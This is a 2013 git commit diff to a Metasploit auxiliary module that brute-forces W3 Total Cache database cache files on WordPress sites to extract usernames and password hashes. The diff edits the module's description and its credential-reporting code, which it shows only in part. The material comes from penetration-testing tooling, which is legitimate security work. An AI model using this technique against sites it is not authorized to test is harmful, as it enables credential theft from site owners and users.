implemented juans feedback

2013-01-14 17:06:52 +01:00 · 2013-01-14 17:06:52 +01:00 · b11fd48b05
parent 8b85f7d977
commit b11fd48b05
1 changed files with 16 additions and 14 deletions
--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
@ -16,17 +16,18 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize
 		super(
 				'Name'          => 'W3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract',
-				'Description'   => %q{
-					The W3-Total-Cache Wordpress Plugin can cache database statements and it's results in files for
-					fast access.
-					These files are in the webroot of the Wordpress installation and can be downloaded.
-					This modules tries to find usernames and password hashes in these files.
-					Vulnerable Versions: <= 0.9.2.4
-					Version 0.9.2.4 has been fixed afterwards so it can be vulnerable.
-				},
+				'Description'   =>
+						"The W3-Total-Cache Wordpress Plugin <= 0.9.24 can cache database statements
+						and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards
+						so it can be vulnerable. These cache files are in the webroot of the Wordpress
+						installation and can be downloaded if the name is guessed. This modules tries to
+						locate them with brute force in order to find usernames and password hashes in these
+						files. W3 Total Cache must be configured with Database Cache enabled and Database
+						Cache Method set to Disk to be vulnerable",
 				'License'       => MSF_LICENSE,
 				'References'    =>
 						[
+								[ 'OSVDB', '88744'],
 								[ 'URL', 'http://seclists.org/fulldisclosure/2012/Dec/242']
 						],
 				'Author'        =>
@ -105,12 +106,13 @@ class Metasploit3 < Msf::Auxiliary
 					print_good("Username: #{match[0]}")
 					print_good("Password Hash: #{match[1]}")
 					report_auth_info(
-							:host	 => rhost,
-							:port	 => rport,
-							:sname	=> ssl ? "https" : "http",
-							:user	 => match[0],
-							:pass	 => match[1],
-							:active => true
+							:host   => rhost,
+							:port   => rport,
+							:sname  => ssl ? "https" : "http",
+							:user   => match[0],
+							:pass   => match[1],
+							:active => true,
+							:type   => "hash"
 					)
 					users_found = true
 				end